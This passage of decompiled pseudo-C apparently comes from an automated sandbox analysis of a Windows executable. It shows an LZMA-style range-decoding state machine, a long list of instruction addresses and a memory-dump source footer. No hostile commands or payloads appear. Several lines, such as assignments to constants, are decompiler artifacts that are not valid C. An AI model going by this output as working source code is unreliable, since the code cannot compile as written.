                                                            								__eax =  *(__ebp - 0x2c);
                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            								__eax = 0;
                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            								__al = __al & 0x000000fd;
                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            								__eax =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                            								__eflags = __eax;
                                                            								 *(__ebp - 0x58) = __eax;
                                                            								goto L68;
                                                            							}
                                                            							__eax =  *(__ebp - 4);
                                                            							__ecx =  *(__ebp - 0x38);
                                                            							 *(__ebp - 0x84) = 8;
                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            							goto L132;
                                                            						case 8:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xa;
                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x38);
                                                            								__ecx =  *(__ebp - 4);
                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                            								 *(__ebp - 0x84) = 9;
                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            							}
                                                            							goto L132;
                                                            						case 9:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								goto L89;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x60);
                                                            							if( *(__ebp - 0x60) == 0) {
                                                            								goto L171;
                                                            							}
                                                            							__eax = 0;
                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            							__eflags = _t258;
                                                            							0 | _t258 = _t258 + _t258 + 9;
                                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            							goto L75;
                                                            						case 0xa:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 4);
                                                            								__ecx =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x84) = 0xb;
                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x28);
                                                            							goto L88;
                                                            						case 0xb:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__ecx =  *(__ebp - 0x24);
                                                            								__eax =  *(__ebp - 0x20);
                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            							} else {
                                                            								__eax =  *(__ebp - 0x24);
                                                            							}
                                                            							__ecx =  *(__ebp - 0x28);
                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            							L88:
                                                            							__ecx =  *(__ebp - 0x2c);
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            							L89:
                                                            							__eax =  *(__ebp - 4);
                                                            							 *(__ebp - 0x80) = 0x15;
                                                            							__eax =  *(__ebp - 4) + 0xa68;
                                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            							goto L68;
                                                            						case 0xc:
                                                            							L99:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xc;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t334 = __ebp - 0x70;
                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t334;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							__eax =  *(__ebp - 0x2c);
                                                            							goto L101;
                                                            						case 0xd:
                                                            							goto L36;
                                                            						case 0xe:
                                                            							goto L45;
                                                            						case 0xf:
                                                            							goto L57;
                                                            						case 0x10:
                                                            							L109:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x10;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t365 = __ebp - 0x70;
                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t365;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							goto L111;
                                                            						case 0x11:
                                                            							L68:
                                                            							__esi =  *(__ebp - 0x58);
                                                            							 *(__ebp - 0x84) = 0x12;
                                                            							goto L132;
                                                            						case 0x12:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 0x58);
                                                            								 *(__ebp - 0x84) = 0x13;
                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							__eflags = __eax;
                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            							goto L130;
                                                            						case 0x13:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								_t469 = __ebp - 0x58;
                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            								__eflags =  *_t469;
                                                            								 *(__ebp - 0x30) = 0x10;
                                                            								 *(__ebp - 0x40) = 8;
                                                            								L144:
                                                            								 *(__ebp - 0x7c) = 0x14;
                                                            								goto L145;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							 *(__ebp - 0x30) = 8;
                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            							L130:
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							 *(__ebp - 0x40) = 3;
                                                            							goto L144;
                                                            						case 0x14:
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            							__eax =  *(__ebp - 0x80);
                                                            							goto L140;
                                                            						case 0x15:
                                                            							__eax = 0;
                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            							__al = __al & 0x000000fd;
                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            							goto L120;
                                                            						case 0x16:
                                                            							__eax =  *(__ebp - 0x30);
                                                            							__eflags = __eax - 4;
                                                            							if(__eax >= 4) {
                                                            								_push(3);
                                                            								_pop(__eax);
                                                            							}
                                                            							__ecx =  *(__ebp - 4);
                                                            							 *(__ebp - 0x40) = 6;
                                                            							__eax = __eax << 7;
                                                            							 *(__ebp - 0x7c) = 0x19;
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							goto L145;
                                                            						case 0x17:
                                                            							L145:
                                                            							__eax =  *(__ebp - 0x40);
                                                            							 *(__ebp - 0x50) = 1;
                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            							goto L149;
                                                            						case 0x18:
                                                            							L146:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x18;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t484 = __ebp - 0x70;
                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t484;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L148:
                                                            							_t487 = __ebp - 0x48;
                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                            							__eflags =  *_t487;
                                                            							L149:
                                                            							__eflags =  *(__ebp - 0x48);
                                                            							if( *(__ebp - 0x48) <= 0) {
                                                            								__ecx =  *(__ebp - 0x40);
                                                            								__ebx =  *(__ebp - 0x50);
                                                            								0 = 1;
                                                            								__eax = 1 << __cl;
                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            								__eax =  *(__ebp - 0x7c);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								goto L140;
                                                            							}
                                                            							__eax =  *(__ebp - 0x50);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__esi = __edx + __eax;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__ax =  *__esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								__cx = __ax >> 5;
                                                            								__eax = __eax - __ecx;
                                                            								__edx = __edx + 1;
                                                            								__eflags = __edx;
                                                            								 *__esi = __ax;
                                                            								 *(__ebp - 0x50) = __edx;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L148;
                                                            							} else {
                                                            								goto L146;
                                                            							}
                                                            						case 0x19:
                                                            							__eflags = __ebx - 4;
                                                            							if(__ebx < 4) {
                                                            								 *(__ebp - 0x2c) = __ebx;
                                                            								L119:
                                                            								_t393 = __ebp - 0x2c;
                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            								__eflags =  *_t393;
                                                            								L120:
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								__eflags = __eax;
                                                            								if(__eax == 0) {
                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            									goto L170;
                                                            								}
                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                            									goto L171;
                                                            								}
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            								__eax =  *(__ebp - 0x30);
                                                            								_t400 = __ebp - 0x60;
                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            								__eflags =  *_t400;
                                                            								goto L123;
                                                            							}
                                                            							__ecx = __ebx;
                                                            							__eax = __ebx;
                                                            							__ecx = __ebx >> 1;
                                                            							__eax = __ebx & 0x00000001;
                                                            							__ecx = (__ebx >> 1) - 1;
                                                            							__al = __al | 0x00000002;
                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                            							__eflags = __ebx - 0xe;
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							if(__ebx >= 0xe) {
                                                            								__ebx = 0;
                                                            								 *(__ebp - 0x48) = __ecx;
                                                            								L102:
                                                            								__eflags =  *(__ebp - 0x48);
                                                            								if( *(__ebp - 0x48) <= 0) {
                                                            									__eax = __eax + __ebx;
                                                            									 *(__ebp - 0x40) = 4;
                                                            									 *(__ebp - 0x2c) = __eax;
                                                            									__eax =  *(__ebp - 4);
                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                            									__eflags = __eax;
                                                            									L108:
                                                            									__ebx = 0;
                                                            									 *(__ebp - 0x58) = __eax;
                                                            									 *(__ebp - 0x50) = 1;
                                                            									 *(__ebp - 0x44) = 0;
                                                            									 *(__ebp - 0x48) = 0;
                                                            									L112:
                                                            									__eax =  *(__ebp - 0x40);
                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            										_t391 = __ebp - 0x2c;
                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            										__eflags =  *_t391;
                                                            										goto L119;
                                                            									}
                                                            									__eax =  *(__ebp - 0x50);
                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            									__eax =  *(__ebp - 0x58);
                                                            									__esi = __edi + __eax;
                                                            									 *(__ebp - 0x54) = __esi;
                                                            									__ax =  *__esi;
                                                            									__ecx = __ax & 0x0000ffff;
                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                            										__ecx = 0;
                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            										__ecx = 1;
                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            										__ebx = 1;
                                                            										__ecx =  *(__ebp - 0x48);
                                                            										__ebx = 1 << __cl;
                                                            										__ecx = 1 << __cl;
                                                            										__ebx =  *(__ebp - 0x44);
                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                            										__cx = __ax;
                                                            										__cx = __ax >> 5;
                                                            										__eax = __eax - __ecx;
                                                            										__edi = __edi + 1;
                                                            										__eflags = __edi;
                                                            										 *(__ebp - 0x44) = __ebx;
                                                            										 *__esi = __ax;
                                                            										 *(__ebp - 0x50) = __edi;
                                                            									} else {
                                                            										 *(__ebp - 0x10) = __edx;
                                                            										0x800 = 0x800 - __ecx;
                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            										 *__esi = __dx;
                                                            									}
                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                            										L111:
                                                            										_t368 = __ebp - 0x48;
                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                            										__eflags =  *_t368;
                                                            										goto L112;
                                                            									} else {
                                                            										goto L109;
                                                            									}
                                                            								}
                                                            								__ecx =  *(__ebp - 0xc);
                                                            								__ebx = __ebx + __ebx;
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            									__ecx =  *(__ebp - 0x10);
                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            									__ebx = __ebx | 0x00000001;
                                                            									__eflags = __ebx;
                                                            									 *(__ebp - 0x44) = __ebx;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                            									L101:
                                                            									_t338 = __ebp - 0x48;
                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                            									__eflags =  *_t338;
                                                            									goto L102;
                                                            								} else {
                                                            									goto L99;
                                                            								}
                                                            							}
                                                            							__edx =  *(__ebp - 4);
                                                            							__eax = __eax - __ebx;
                                                            							 *(__ebp - 0x40) = __ecx;
                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            							goto L108;
                                                            						case 0x1a:
                                                            							goto L55;
                                                            						case 0x1b:
                                                            							L75:
                                                            							__eflags =  *(__ebp - 0x64);
                                                            							if( *(__ebp - 0x64) == 0) {
                                                            								 *(__ebp - 0x88) = 0x1b;
                                                            								goto L170;
                                                            							}
                                                            							__eax =  *(__ebp - 0x14);
                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            							__eflags = __eax -  *(__ebp - 0x74);
                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                            								__eflags = __eax;
                                                            							}
                                                            							__edx =  *(__ebp - 8);
                                                            							__cl =  *(__eax + __edx);
                                                            							__eax =  *(__ebp - 0x14);
                                                            							 *(__ebp - 0x5c) = __cl;
                                                            							 *(__eax + __edx) = __cl;
                                                            							__eax = __eax + 1;
                                                            							__edx = 0;
                                                            							_t274 = __eax %  *(__ebp - 0x74);
                                                            							__eax = __eax /  *(__ebp - 0x74);
                                                            							__edx = _t274;
                                                            							__eax =  *(__ebp - 0x68);
                                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            							_t283 = __ebp - 0x64;
                                                            							 *_t283 =  *(__ebp - 0x64) - 1;
                                                            							__eflags =  *_t283;
                                                            							 *( *(__ebp - 0x68)) = __cl;
                                                            							goto L79;
                                                            						case 0x1c:
                                                            							while(1) {
                                                            								L123:
                                                            								__eflags =  *(__ebp - 0x64);
                                                            								if( *(__ebp - 0x64) == 0) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__ebp - 0x14);
                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                            									__eflags = __eax;
                                                            								}
                                                            								__edx =  *(__ebp - 8);
                                                            								__cl =  *(__eax + __edx);
                                                            								__eax =  *(__ebp - 0x14);
                                                            								 *(__ebp - 0x5c) = __cl;
                                                            								 *(__eax + __edx) = __cl;
                                                            								__eax = __eax + 1;
                                                            								__edx = 0;
                                                            								_t414 = __eax %  *(__ebp - 0x74);
                                                            								__eax = __eax /  *(__ebp - 0x74);
                                                            								__edx = _t414;
                                                            								__eax =  *(__ebp - 0x68);
                                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            								__eflags =  *(__ebp - 0x30);
                                                            								 *( *(__ebp - 0x68)) = __cl;
                                                            								 *(__ebp - 0x14) = __edx;
                                                            								if( *(__ebp - 0x30) > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L80;
                                                            								}
                                                            							}
                                                            							 *(__ebp - 0x88) = 0x1c;
                                                            							goto L170;
                                                            					}
                                                            				}
                                                            			}













                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ffe
                                                            0x00407002
                                                            0x00407020
                                                            0x00407023
                                                            0x0040702a
                                                            0x0040702d
                                                            0x00407030
                                                            0x00407033
                                                            0x00407036
                                                            0x00407039
                                                            0x0040703b
                                                            0x00407042
                                                            0x00407043
                                                            0x00407045
                                                            0x00407048
                                                            0x0040704b
                                                            0x0040704e
                                                            0x0040704e
                                                            0x00407053
                                                            0x00000000
                                                            0x00407053
                                                            0x00407004
                                                            0x00407007
                                                            0x0040700a
                                                            0x00407014
                                                            0x00000000
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x00000000
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407137
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x00000000
                                                            0x004073c8
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00000000
                                                            0x0040753b
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
